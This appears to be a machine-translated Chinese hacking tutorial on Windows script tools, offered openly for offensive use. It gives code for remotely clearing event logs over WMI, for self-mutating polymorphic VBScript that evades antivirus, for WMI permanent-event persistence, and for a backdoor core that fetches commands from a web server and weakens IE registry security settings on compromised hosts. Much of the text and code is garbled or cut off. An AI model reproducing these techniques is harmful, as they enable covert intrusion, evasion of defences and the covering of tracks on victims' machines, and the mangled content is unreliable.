志
".write"
target IP: "can also open a '.write"
username with the NaviGate method: "The effect is the same. '.write"
password: ".write"
Type: "'Not only the INPUT object, all DHTML support' .write" application "object and its properties, the method can be used. '.write system ".write" security "'Access these objects and access' .write"
"Frame Object is similar.
'.write "" .write "" .write " " End with Dim WMI " Explicitly definition a global variable 'set wnd = ie.document.parentWindow' Settings WND for window object 'set id = IE.Document.all' Sets the collection of all objects in Document 'id.confirm.onclick = getRef (" CONFIRM ") 'Set the handler when you click" OK "button' id.cancel.onclick = getref (" CANCEL ") Set the handler" Cancel "button to the" Cancel "button 'Do While True' Since the IE object supports events, Correspondingly, 'WScript.sleep 200' scripts waits for a variety of events in an infinite loop.
'loop subnend_onquit' IE Exit Event Process' WScript.quit 'When Ie exits, the script also exits' End Sub Sub Cancel' "Cancel" Event Process' IE.quit 'Call IE Quit Method, Turn the IE Window' End sub 'then triggers Event_onquit, so the script also exits the' Sub Confirm '"OK" event process, which is the key' with id if .ip.value = "" "" "" "ip.value =". " The value is default to the local operation 'if not (.app.checked or.sys.che "app, etc. is Checkbox, by detecting its checked' wnd.alert (" at least one log " ) 'Attribute, to determine if it is selected.
'Exit sub end if set LCT = CreateObject ("Wbemscripting.swbemlocator")' Creating Server Location Object 'on Error ResMe next' makes script host ignore unsatisfied error 'set wmi = lct.connectServer (.ip.value, "root / CIMV2 ",. user.value, .pass.value) 'Connect to root / cimv2 name space' if err.number dam to capture errors and handle 'Wnd.alert (" Connect WMI Server Failure ")' This is just simple Display "failed" 'err.clear on error goto 0' still processes all script hosts "EXIT SUB End if if .app.checked dam" Application "'Clear each selected log' if.s.checked the Clearlog "system" if .sec.checked killick "security" 'Note * from win32_nteventlogfile where logfilename = '"& name") Note 'But specify the file object of the log. 'If l.cleareventlog () THEN WND.Alert ("Clear Log" & Name & "Error!") IE.quit WScript.quit End If Next End Sub summed up the entire process. The first is to create an InternetExplorer.Application object. Its direct effect is to start an Iexplorer process, but the window is invisible until IE.visible = 1 is set. The HTML statement is then written to the IE window with the Document.Write method. For complex interfaces, the HTML code can be saved as an HTML file, open with IE.NAVIGATE (FileName). Finally, it is the input in the response window. This is basically a scope of knowledge of DHTML. The most different from the general script programming is that IE is an event-driven. What you have to do is setting the corresponding event handler / process.
In this example, the script only cares about 3 events: IE exits, "OK" button is clicked, "Cancel" button is clicked. Note that there is only two statements that set the event handling process in the example, and no IE exit event is associated with the Event_ONQUIT process. This is because here uses a feature - the second parameter "event_" when creating an IE object is a prefix, and the Event Process of the IE object is the prefixed event name. So the process of the ONQUIT event is due to Event_ONQUIT. When the "OK" button is clicked, the confirm process is called. The example demonstrates how to access objects in IE, such as IE.Document.all.ip.Value is the input in the Target IP text box. If "Application" this checkbox, IE.Document.all.App.checked is true, otherwise false. To call the Alert method, use IE.Document.parentWindow.alert. The access methods of other IE objects are totally similar. Specifically, you can see DHTML related information. With the web interface, interaction becomes rich and colorful. Everyone can give full play to creativity. For example, many GUI tools (such as streaming) are started, there is a logo page, display copyright information. We can also simulate one out: CODZ: set IE = wscript.createObject ("InternetExplorer.Application") ie.fullscreen = 1 IE.Width = 300 ie.Height = 150 IE.NAVIGATE "About" & ": Blank "IE.LEFT = FIX ((ie.document.parentwindow.screen.availwidth-ie.width) / 2) IE.top = FIX ((ie.document.parentwindow.screen.availheight-ie.height) / 2) IE .document.write "
After the code is executed above, it will display an IE window that is connected to the screen and the border in the center of the screen for 5 seconds.
The window is a black word of the blue bottom. This is a logo.
After the script GUI, the interaction with the user is more intuitive. Tools with many parameters like NMAP, when used locally, "Interface" that writes a graphical interface is eternal. The result of the output can also be processed with script to display, which is displayed in a way that can generate an HTML scan report like a tool such as stream light.
[Anti-check]
The first thing to say is that I have not tried to challenge the anti-virus software anti-virus capabilities. The Windows script is an explanatory language, a clear text saves code. Since there is no compilation process, the complexity of the code is far less than the executable program (EXE). Don't do anything else, there is no reason to count on the script. However, it is because the inspection of the script is very poor, so that the killing method used by anti-virus software is not advanced. So we organically multiply.
Let's take a look at the common anti-check method:
1, split / reorganization of strings or statements.
The most typical example is to turn fso = createObject ("scripting.filesystemObject") into fso = createObject ("script" "ing.filesystem " mobject ")
The extension of this approach is to use the Execute statement:
Execute ("fso = creA" "teobject (" "SCR" "ipting.filesy " STEMOBJECT "") ")
2, the variable name automatically changes.
CODZ:
Randomize set of = createObject ("scripting.filesystemObject") VC = Of.OpenTextFile (wscript.scriptfullname, 1) .readall fs = array ("of", "vc", "fs", "fsc") for fsc = 0 TO 3 VC = Replace (VC, FS (FSC), CHR ((INT * 22) 65) & chr ((IND * 22) 65) & chr ((int (IND * 22) 65)) & chr ((int (RND * 22) 65)) Next Of.OpenTextFile (Wscript.scriptFullname, 2, 1) .writeline VC
The above code takes from the love virus. If you run, you know what is going on.
3, use the official tool - script encoder Screnc.exe [5] encrypted script.
The encrypted script can be directly explained by the script host. This is the best solution, but "guns and birds", because encryption is reversible, all anti-virus software has decoding function. Therefore, the effect of this approach is basically zero.
The first method is effectively telling us that this fact: the killing of the script virus is basically static. Moreover, I found that even if it is only changed, it can also play an anti-check (only a anti-virus software). The key to the reverse investigation is to reduce the signature.
For the anti-check killing of EXE, it is easier to think about "housing". This approach can also be applied on the script. such as:
CODZ:
Str = "cswpire.tohco" "" "" "! k" for i = 1 to len (str) Step 3 Rev = Rev Strreverse (MID (STR, I, 3)) Next Execute Rev
A simplest "shell". The algorithm of "shell" is the order of reverse per n character. n is the "seed" of the algorithm. In this example it is equal to 3.
This "shell" is dead and does not reducing the effect of the signature. Instead, the signature is added, such as "CSWPire".
Look at a complex example:
CODZ:
Str = "WScript.echo" "OK!": rDomize: key = int (RND * 8 2): str = Rev: str = Replace (STR, CHR (34), CHR (34) CHR (34) : SET ASO = CreateObject ("AdoDb.Stream"): with aso: .open: .writetext "Str =" " CHR (34) STR CHR (34) " ": Key =" CSTR (Key) "": str = Rev: Execute str: function rev (): for i = 1 to len (str) Step key: Rev = Rev Strreverse (MID (Str, I, KEY): NEXT : End function "":. Savetofile wscript.scriptfullname, 2: end with ": key = 1: str = Rev: Execute str: function rev (): for i = 1 to Len (str) Step key: rev = REV Strreverse (MID (STR (STR, I, Key): Next: End Function (Note that this code is only one line, no carriage return)
Save as a VBS file, double-click execution, effect or the previous code, pop up a dialog box displays "OK!".
However, after the execution will look at the code, it may become like this:
CODZ:
Str = "tpircsw" "Ohce.ar:"" !koezimodnni=yek:8*dnr (TRTS :)2 ts:ver=alper=r ,rts (EC) 43 (RHC43 (RHC, 3 (RHc )" )) 4RC = OSA JBOETAEDA "" (Tcerts.bdow :) "" Maeosa HTI: nepo.: Tetirw.ts "" TXERHC "= RTS ) 43 (3 (RHC Rek:" ) 4TSC "= Y ) Yek (rr = rts: "" CEXE: VERTS ETUITCNUF: (Ver Noi ROF:) L OT 1 =) RTS (nek pets = Ver: Yerts VERESREVERTS (DIM (Yek, I, RTXEN :)) UF DNE: " "NOITCNTEVAS. :W Elifo.tpircsftPircSemanllu DNE: 2, HTIW": key = 7: str = Rev: Execute str: function rev (): for i = 1 to LEN (STR) Step key: Rev = Rev strreverse (MID (STR, I, KEY): Next: End Function
Execute and become other things. This script is self-deformed.
If you look at the code carefully, you will find that the algorithm of "shell" is still, while "seed" is randomly changed. However, the elongated content is different each time, "shell" itself still has no changes. Many EXE handle tools, it is used as malicious code to extract the character code. In order to better inspector, the "shell" of the script also needs to be dynamically changed. This is to use so-called polymorphism. However, EXE's polymorphism is used to counter-motion, and the "polymorphism" of the script is only payable, and the two are very different. For EXE, the real polymorphism has not yet been heard. How much is the script that can only do.
Do not affect the modification of the function, in addition to the three mentioned above, as well as:
1, random change cases;
2, the colon (:) is randomly interchanged with the carriage return (except the colon after the character string and "THEN");
3, " " and "&" are randomly interchanged when string segmentation;
4, () - * / &, other characters to add spaces or complex (_) and enrollment combinations;
5, replace the built-in function with custom functions; even if the custom function is just a simple package built-in function, at least the keyword is changed.
..........
There are other "polymorphic" algorithms to be cared for.
The application of these algorithms is premised on a large increase in code length. If you want to write a relatively perfect "shell", I believe that I will involve the knowledge of "Grammar Analysis", because the script should "read" itself, thus achieving the effect similar to the Java obfuscator, this is very complicated, there is a chance to be again Everyone discussed. Below we applies "statement segmentation", "variable name automatic change", "random case", " and & interchange", look at the effect:
CODZ:
A001 = "WScript.echo" "OK!": A004 = CHR (34): Randomize: A005 = INT (RND * 24000 40960): A001 = A006 (A001): A000 = A005 MOD 10 2: A001 = Replace (A002, A004, A004 & A): SET A007 = CreateObject ("AdoDb.Stream"): A007.Open: A007.WriteText HEX (A005 1) & "=" "& A004 & A001 & A004 & A008 (": Execute " & A004 & A006 ("A000 =" "& A000 &": A001 = A002: Execute A001: Function A002 (): for A003 = 1 To LEN (A001) Step A000: A002 = A002 STREVERSE (MID (A001, A003, A000) : Next: End function "" "& A004): A007.Savetofile Wscript.scriptfullname, 2: Function A006 (A009): For A00A = 0 to 12: A009 = Replace (A009, HEX (& HA000 A00A), HEX (A005 A00A): Next: A006 = A009: END FUNCTION: Function A008 (A009): for A00A = 1 to LEN (A009): A00B = MID (A009, A00A, 1): IF INT (RND * 2-1) THEN A00B = UCase (A00B): END IF: IF A00A> 11 and INT (RND * 5) = 0 THEN A008 = A008 & A004 & CHR (38 INT * 2) * 5) & A004: END IF: A008 = A008 & A00B: NEXT : End function ": A000 = 1: A001 = A002: Execute A001: Function A002 (): for A003 = 1 To LEN (A001) Step A000: A002 = A002 STRREVERSE (MID (A001, A003, A000): Next : End function (Note, where there is no carriage return)
The above is "original", saved as a VBS file, double-click, or the pop-up dialog box displays "OK!". I look at the code is so similar (the effect is random):
CODZ:
B906 = "TPIRCSW" "OHCE.9B:" "! KO (RHC = 90nar:) 43: EzimodNi = A09B2 * DNR (T04 00049B:) 069B09B = 60:) 609B (9B = 509b DOM A09B: 2 01Lper = 6009B (ECA, 909B, 79B & 909Btes:) 90c = c09b Boetaera "" (Tcejts.bdod :) "" MaerPo.c09bc09b: NetTirw.xeh TXE1 A09B (B & "" = "" &) 09B & 909 & 909B & 6: "" (D09betucexe909B & "" "" (B09b && "= 509b:" "& 509b9b = 609bcexe: 709b etcnuf: 609b NOITOF:) (70 = 809b Rel OT 1) 609B (NB PETS 09B: 509 709B = 7everrtsdim (ESRB, 609B (09B, 809XEN) ) 5f DNE: TnOitcnu909b &) "" "" "" "Fotevascsw Elics.tpirluftPir2, Emanlitcnuf: B09B NO:) E09B (09b ROF OT 0 = Fe09B: 21Calper =, E09B (EBH & (XEH09B 509 (XEH,) F9B A09BEN :)) F0B09B: TXE: E09B = CNUF DNUF: NOIT NOITCN9B (D09Brof:) E01 = F09B Nel OT:) E09B (IM = 019b, E09B (D) 1, F09BTNI FI: -2 * DNR (NEHT) 1U = 019b 9b (esacdne:) 01 FI: FI 11> F09BNI DNA 5 * DNR (TEHT 0 =) = D09B N9B & D09B (RHC & 90 (TNI 83 *) 2 * DNR909B &) 5FI DNE: B = D09B: 19B & D09: TXEN: 0NUF DNENOITC " : Execute "B9" & "05 = 7" & ": b906" & "= b907: e" "xec" "ute b906" ": fun" & "ction b9" & "07 (): for" "B9" "08 = 1 to L" & "en (b906)" "Step B905: B907" & "= B907 " Strreverse ("&" B9 "&" 0 "&" 6, B908, B905 "&") " "): N " " EX " " T " ": End Fun "&" CTION "is not? Again:
CODZ:
F0CB = "rcsw.tpiohceko" "f:" "! = EC0 (RHC:) 43DNARZIMO0F: EI = FCR (TN2 * DN0004904 :) 06bc0fd0f = 0f (0:) bcac0fc0f = om F01 DF: 2 = Bc0Lper (ECACC0FC0F, 0F, EF & EC) EC0tes: D0F RC = 1Taeejbo "" (Tcdodats.bmaerf :) "" "" "" "" "" "" "=" "=" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" " (0 = AC00F & "" "" "CCUCEX ETBC0FNUF: OITC0F N) (Ccrof: C0F 1 = DL OTF (NE) BC0ETS 0F PF: AC = CC0CC0FRTS EVER (ESR (DIMBC0FC0F, 0F, D)) Acxen: Ne: tuf ditcn "" NOC0F & f:) E.1D0EVASIFTW ELIRCSS.TPPIRCLUFTW ELIRCSS.TPPIRCLUFTMANL: 2, ECNUFNOITD0F 0F (0:) 3D ROF4D0FT 0 = 21 OD0F: ER = 3Calp0f (EH, 3D & (XEC0FH0F A,) 4D (XEHFC0FD0F :)) 4TXEND0F: 0F = 0e: 3DF DNTCNU: Noichufnoitd0f 0f (2:) 3D ROF4D0FT 1 = EL O0F (N:) 3D5D0FDIM = D0F (0F, 31, 4DFI:) TNI DNR (1-2 * HT) f NE = 5d0 SACU0F (E:) 5D DNEI: FI0F F1> 4DNA 1Ni DNR (T) 5 * DT 0 = Neh2D0FD0F = 0F & 2C & EC3 (RHNI 8nR (T) 2 * D &) 5 * Ec0fdne :: Fi 2D0FD0F = 0F & 2N: 5D: TXE DNECNUFNOIT ": Execute" f " " 0ca "&" = 4: f0cb " " = " " f0cc: EX " " "CUTE F0CB" & ": f" "UNC" "Tion F0cc (): F " " OR " " F0 "&" CD = 1 to Len (F0CB) Step F0CA: F0CC = F0CC STRR " " Ever " " SE "&" (MID (" " F0CB, " " F0CD, F0CA): N Is this enough? --do not know. Perhaps the anti-virus engine is ignored by ignore the case. It can be automatically connected to the string.
Is this "shell" practical? --No. Because the algorithm of "shell" is too simple. "Seed" A000 = A005 MOD 10 2, so if the automatic change variable name is not considered, only 10 of the shells have only 10 kinds of code. How to improve this "shell"? - Of course, more complex algorithms, more "polymorphism".
If you are interested, you can look at the "original" script code (replace the colon as a carriage return, readability is better), then strengthen it.
Of course, you can also stove, free to show your creativity.
[To do a back door]
Before discussing the script, you need to introduce a very useful WMI object. In fact, this is the key to this section. The script back door is just an application.
As mentioned earlier, WMI is an event-driven. The entire event handling mechanism is divided into four parts:
1. Event producers: Responsible for events. WMI contains a lot of event producers. Specific event producers in performance counters, also have universal event producers such as category, creating, modification, deletion, and other universal events.
2, Event Filter: The system generates a large number of events all times, and scripts can capture the events of interest by custom filters.
3. Event Consumers: Responsible for handling events. It can be an executable program, a dynamic link library (DLL, loaded by WMI) or script.
4, Event Binding: By binding the filter and consumer, clear what consumers are responsible for processing.
Event consumers can be divided into temporary and permanent. Temporary event consumers only care about specific events during their operations. Permanent consumers as an instance of the class registration in the WMI name space, which has always been valid until it is canceled. Obviously, permanent event consumers are more practical. Or come to see an example:
CODZ:
Nslink = "Winmgmts: //./root/cimv2:" is only available locally, so use this syntax, no Swbemlocator object 'set acsert = getObject (NSLink & "ActiveScripTeventConSumer). SpawnInstance_' creation" event script event consumer " 'asec.name =" stopped_spooler_restart_consumer "' definition of the consumer's name 'asec.scriptingengine =" vbscript "' defined scripting language (only vbscript) 'asec.scripttext =" getobject ( "" winmgmts: win32_service =' spooler ' "") .startservice " 'script code' set asecpath = asec.put_ 'registered consumers to return their links' set evtflt = getobject (nslink &" __ EventFilter "). spawninstance_ 'Creating an event filter' evtflt.name =" stopped_spooler_filter " 'Define the name of the filter' QStr = "Select * from __instancemodificationEvent With" 'Every 5 seconds query "instance modification event"' qstr = QSTR & "Where targetinstance isa" "Win32_service" "and" target instance class is Win32_Service 'qstr = qstr & "targetinstance.name =" "" "" "" The instance name is spooler' qstr = qstr & "and targetinstance.state =" "" "" "" "The state attribute is stopped 'evtflt.Query = QSTR 'Defined query' evtflt.querylanguage = "wql" 'definition of query language (only wql)' set fltpath = evtflt.put_ 'registered filters, return to their links' set fcbnd = getobject (nslink & "__ FilterToConsumerBinding"). Spawninstance_ 'Creating a filter and consumer's bind' fcbnd.consumer =
Asecpath.path 'Specifies consumers' fcbnd.filter = fltpath.path 'Specify filter' fcbnd.put_ 'Performing Bind' WScript.echo "Installation" This script is: When "Spooler) When the state changes to stop, the consumer will process - restart the spooler.
First Net Start Spooler, then Net Stop Spooler. For up to 5 seconds, Spooler will start again.
The script directly running will be wrong because "ActivescriptEventConSumer Asec) is not installed to the root / cimv2 name space by default.
Use Notepad to open% Windir% / System32 / WBEM / SCRCONS.MOF to delete the first line "#pragma namespace (" .//root//-DEFAULT ")" delete, or modified to "#pragma namespace.". Root // CIMv2 ")". XP / 2003 does not have this line without modification.
Then do this below:
C: / Winnt / System32 / WBEM> Mofcomp.exe -n: root / cimv2 scrcons.mof
Microsoft (R) 32-bit MOF assembler version 1.50.1085.0007
Copyright (C) Microsoft Corp. 1997-1999. all rights reserved.
MOF file: Scrcons.Mof
MOF file analysis success
Store data into the reserve ...
completed!
This installs the ASEC to root / CIMV2. Mofcomp.exe and Scrcons.mof are all self-contained.
2000 The default is installed to the root / default name space, while XP / 2003 has been installed to the root / subscription name space, but due to the event filter, the event filter cannot be captured (XP / 2003 can be), the event binding cannot be across Namespace, and most events are generated in root / CIMv2, so you need to reinstall the namespaces where the ASEC to the event source is. Below this script automatically completes ASEC to re-install tasks.
CODZ:
set shl = createobject ( "WScript.Shell") set fso = createobject ( "Scripting.FileSystemObject") path = shl.expandenvironmentstrings ( "% windir% / system32 / wbem") set mof = fso.opentextfile (path & "/ scrcons. MOF ", 1, false, -1) 'MOF is a unicode format' MOFS = MOF.READALL MOF.CLOSE MOFS = Replace (MOFS," // default "," // CIMv2 ", 1, 1) 'replacement Default namespace 'mofp = path & "/ spacecimv2.mof" set mof = fso.createtetextfile (mofp, false, true)' Create a temporary MOF file 'MOF.WRITE MOFS MOF.CLOSE SHL.RUN PATH & "/ Mofcomp.exe - N: root / cimv2 "& mofp, 0, true" Installing Root / Cimv2 'fso.deletefile (MOFP) WScript.echo "Installation" logout permanent event:
CODZ:
nslink = "winmgmts: //./root/cimv2:" myconsumer = "stopped_spooler_restart_consumer" 'specifies the name of the consumer' myfilter = "stopped_spooler_filter" 'specified filter name' set binds = getobject (nslink & "__ FilterToConsumerBinding") instances_. For Each Bind In Binds if strass (Right (bind.consumer) 1), Myconsumer & Chr (34), 1) = 0_ and strcomp (Right (Bind.Filter, Len (MyFilter) 1), MyFilter & Chr (34), 1) = 0 THEN getObject ("WinMgmts:" & bind.consumer). Delete_ 'Delete Consumer' getObject ("WinMgmts:" & bind.filter) .delete_ 'Delete Filter' Bind.delete_ 'Delete Bind 'Exit for end if next wscript.echo "Uninstall"
In addition to ASEC, WMI also provides other permanent event consumers, such as SmtpeventConsumer. When the system appears anomaly, you can automatically send a letter to the administrator's mailbox. Wmitools WMI Event Registration is used to create, modify, delete instances of permanent event consumers, event filters, and timer event sources in the specified namespace, and bind or release them.
Regarding the various parts of the event handling mechanism, there is a detailed story in the "WMI Technical Guide", and it is of course more comprehensive in MSDN. I will not have it. (Look at it, drink the water, take a break ^ _ ^)
Here, discuss the script back door.
WMI provides two timers: __ absolutetimerinstruction and __intervaltimerinstruction, generates events in the specified time and time interval, registering a filter to capture timer events, then bind ASEC, we have received a rare program from Starting method. Moreover, the script code is completely hidden in the CIM repository, does not exist in an independent file, and the killing is more difficult. This is the advantage of the back door of the script, but it is difficult to say:
1. When the script is run, Scrcons.exe comes with the system as a script host (Windows designer has not been stupid to use WMI service as a script host). This will increase a process, although it is a normal process, anti-virus software is nothing, but it is too conspicuous. So, you can't let the script run in the background, but should start once every time, then end as soon as possible. After the script is over, the Scrcons.exe process will not end automatically, and the script must take the script to take the initiative to terminate the host process with Win32_Process objects provided by WMI (boiled beans 萁 萁 ?!).
2, the network function of the script is very poor, basically only relying on objects such as Microsoft.xmlhttp. Therefore, the script rear door cannot listen to the port and provide the CMD shell, which can only be connected to the web server to get the control command. A viable way is to put a command file on the web server, the script is backed up to find the server according to the domain name and download the command file, and respond according to the content. So, you need a web server, or build a temporary server with tools such as NetBox. Of course, you don't need to let the server always online, you need to control the script after running again.
3. Since the script rear door intermittent operation, it is necessary to prevent the same command from being run again. The solution is to record the length of the command in the registry, compare the length and record each time you get the command, if the same is skipped, the difference overrides and executes the command.
4. In order to penetrate the firewall with the IE object, the XMLHTTP object must be created in IE, which will be limited by the Internet domain security level. Even if the code is saved in the HTML file, use IE to open it, but it is just a "my computer" domain, create an unsafe ActiveX object or the warning dialog will pop up. The solution is to modify the registry and temporarily change the security settings.
5. WScript object is provided by WScript.exe or CScript.exe, while Scrcons.exe is not provided, so many common functions, such as WScript.sleep can't be used. You can't use XMLHTTP asynchronously without Sleep, and synchronous XMLHTTP may be blocked for a long time, which is much more disadvantage over the latter. Calling the ping command delaying a new process, with a "咚" tone with the POPUP method of WScript.Shell. Good in Microsoft.xmlhttp "relatives", such as MSXml2.xmlhttp, msxml2.serverxmlhttp, msxml2.domdocument, Winhttp.winhttpRequest, etc. The last one can set the timeout, just satisfied it.
Even if there is more difficulties, the script is still worth challenged. When the various types of Trojans on broiler have been cleared by the anti-virus software, the latte behind a 24-hour run may be your last hope. Below is a simple script back door core code (no installation function):
CODZ:
CMDU = "http://myweb.8866.org/cmd.txt" 'URL' cmdw = 4000 'from the web server gets commands URL' cmdw = 4000 'Download Timeout 4 second' cmdl = "HKLM / Software / Microsoft / WBEM / CIMOM / CMDLENGTH "'" Record command length key value name' on error resume next 'ignores Non-fatal error' (Comment time) SEL = CreateObject ("wscript.shell") 'Although WScript root object, its child object or you can use the 'set aso = createobject ( "ADODB.Stream") set ie = createobject ( "InternetExplorer.Application")' use ie to bypass the firewall 'zone = "HKCU / SOFTWARE / Microsoft / Windows / CurrentVersion / Internet Settings / ZONES / 3 "set1 = zone &" / 1201 "set2 = zone &" / 1400 "set3 = zone &" / currentlevel "VAL1 = shl.regread (set1) 'Save the original security setting' VAL2 = shl.regread (set2) VAL3 = SHL.REGREAD (SET3) Regd = "REG_DWORD" shl.RegWrite set1, 0, regd 'allows the unsafe ActiveX' shl.RegWrite set2, 0, regd 'allows activity script' SHL.REGWRITE SET3, 0, Regd 'Set the current Internet domain security level to "custom"' IE.visible = 0 ': ie.visible = 1' (debugging) IE.NAVIGATE "About" & ": blank" "Use string connection to purely Anti-Forum filtering 'Ie.docu Ment.write _
